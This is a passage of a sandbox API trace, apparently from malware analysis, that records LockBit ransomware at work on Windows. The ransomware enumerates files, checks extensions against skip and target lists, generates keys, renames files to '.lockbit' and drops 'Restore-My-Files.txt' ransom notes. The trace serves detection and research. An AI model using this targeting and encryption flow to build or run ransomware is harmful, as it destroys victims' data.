lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0161.346] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0161.346] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.346] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0161.346] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0161.346] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0161.346] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0161.346] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0161.346] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0161.346] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0161.346] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0161.346] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0161.346] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0161.346] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0161.347] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0161.347] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0161.347] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0161.347] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0161.347] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0161.347] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0161.347] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.347] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0161.347] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0161.347] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0161.347] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0161.347] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0386764.JPG") returned 1 [0161.347] lstrcmpiW (lpString1="ntldr", lpString2="J0386764.JPG") returned 1 [0161.347] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0386764.JPG") returned 1 [0161.347] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0386764.JPG") returned -1 [0161.347] lstrcmpiW (lpString1="autorun.inf", lpString2="J0386764.JPG") returned -1 [0161.347] lstrcmpiW (lpString1="thumbs.db", lpString2="J0386764.JPG") returned 1 [0161.347] lstrcmpiW (lpString1="iconcache.db", lpString2="J0386764.JPG") returned -1 [0161.347] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.347] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386764.JPG") returned=".JPG" [0161.347] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0161.347] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0161.347] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0161.347] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0161.347] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0161.347] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0161.348] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0161.348] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0161.348] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0161.348] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0161.348] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0161.348] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0161.348] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0161.348] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0161.348] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0161.348] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0161.348] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0161.348] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0161.348] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0161.348] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0161.348] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0161.348] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0161.348] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0161.348] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0161.348] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0161.348] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0161.348] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0161.348] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0161.348] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386764.JPG.lockbit") returned 72 [0161.348] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386764.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0386764.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.349] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.349] malloc (_Size=0x40068) returned 0x3df0008 [0161.350] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=26942) returned 1 [0161.350] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.350] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.350] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.351] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.351] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.357] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386764.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386764.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.357] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.357] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.359] free (_Block=0x1fa2ed8) [0161.359] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0386764.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.359] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.359] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.359] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x661fae90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xcb0a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0387337.JPG", cAlternateFileName="")) returned 1 [0161.359] lstrcmpiW (lpString1=".", lpString2="J0387337.JPG") returned -1 [0161.359] lstrcmpiW (lpString1="..", lpString2="J0387337.JPG") returned -1 [0161.359] PathFindExtensionW (pszPath="J0387337.JPG") returned=".JPG" [0161.359] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0161.359] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0161.360] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0161.360] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0161.360] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0161.360] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0161.360] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0161.360] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0161.360] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0161.360] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0161.360] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0161.360] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0161.360] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0161.360] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0161.360] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0161.360] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0161.360] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0161.360] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0161.360] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0161.360] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0161.360] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0161.360] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0161.360] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0161.360] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0161.360] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.360] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0161.360] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0161.360] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0161.361] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0161.361] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0161.361] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0161.361] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0161.361] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0161.361] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0161.361] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0161.361] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0161.361] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0161.361] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0161.361] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0161.361] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0161.361] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0161.361] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0161.361] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.361] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0161.361] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0161.361] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0161.361] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0161.361] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0387337.JPG") returned 1 [0161.361] lstrcmpiW (lpString1="ntldr", lpString2="J0387337.JPG") returned 1 [0161.361] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0387337.JPG") returned 1 [0161.361] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0387337.JPG") returned -1 [0161.361] lstrcmpiW (lpString1="autorun.inf", lpString2="J0387337.JPG") returned -1 [0161.361] lstrcmpiW (lpString1="thumbs.db", lpString2="J0387337.JPG") returned 1 [0161.361] lstrcmpiW (lpString1="iconcache.db", lpString2="J0387337.JPG") returned -1 [0161.362] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.362] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387337.JPG") returned=".JPG" [0161.362] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0161.362] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0161.362] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0161.362] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0161.362] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0161.362] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0161.362] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0161.362] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0161.362] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0161.362] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0161.362] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0161.362] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0161.362] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0161.362] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0161.362] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0161.362] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0161.362] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0161.362] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0161.362] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0161.362] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0161.362] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0161.362] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0161.363] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0161.363] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0161.363] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0161.363] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0161.363] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0161.363] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0161.363] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387337.JPG.lockbit") returned 72 [0161.363] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387337.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387337.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.364] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.364] malloc (_Size=0x40068) returned 0x3df0008 [0161.364] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=51978) returned 1 [0161.364] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.365] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.365] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.365] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.365] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.371] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387337.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387337.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.371] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.371] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.374] free (_Block=0x1fa2ed8) [0161.374] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387337.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.374] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.374] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.374] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x567be5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x6cec, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0387578.JPG", cAlternateFileName="")) returned 1 [0161.375] lstrcmpiW (lpString1=".", lpString2="J0387578.JPG") returned -1 [0161.375] lstrcmpiW (lpString1="..", lpString2="J0387578.JPG") returned -1 [0161.375] PathFindExtensionW (pszPath="J0387578.JPG") returned=".JPG" [0161.375] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0161.375] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0161.375] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0161.375] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0161.375] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0161.375] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0161.375] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0161.375] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0161.375] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0161.375] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0161.375] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0161.375] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0161.375] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0161.375] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0161.375] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0161.375] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0161.375] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0161.375] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0161.375] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0161.375] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0161.375] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0161.375] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0161.376] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0161.376] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0161.376] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.376] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0161.376] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0161.376] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0161.376] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0161.376] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0161.376] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0161.376] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0161.376] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0161.376] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0161.376] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0161.376] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0161.376] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0161.376] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0161.376] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0161.376] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0161.376] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0161.376] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0161.376] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.376] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0161.376] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0161.376] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0161.376] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0161.376] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0387578.JPG") returned 1 [0161.376] lstrcmpiW (lpString1="ntldr", lpString2="J0387578.JPG") returned 1 [0161.377] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0387578.JPG") returned 1 [0161.377] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0387578.JPG") returned -1 [0161.377] lstrcmpiW (lpString1="autorun.inf", lpString2="J0387578.JPG") returned -1 [0161.377] lstrcmpiW (lpString1="thumbs.db", lpString2="J0387578.JPG") returned 1 [0161.377] lstrcmpiW (lpString1="iconcache.db", lpString2="J0387578.JPG") returned -1 [0161.377] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.377] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387578.JPG") returned=".JPG" [0161.377] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0161.377] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0161.377] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0161.377] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0161.377] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0161.377] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0161.377] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0161.377] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0161.377] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0161.377] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0161.377] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0161.377] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0161.377] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0161.377] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0161.377] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0161.377] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0161.377] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0161.378] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0161.378] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0161.378] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0161.378] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0161.378] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0161.378] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0161.378] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0161.378] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0161.378] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0161.378] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0161.378] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0161.378] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387578.JPG.lockbit") returned 72 [0161.378] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0387578.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0387578.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.379] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.379] malloc (_Size=0x40068) returned 0x3df0008 [0161.379] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=27884) returned 1 [0161.379] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.380] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.380] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.380] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.380] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, 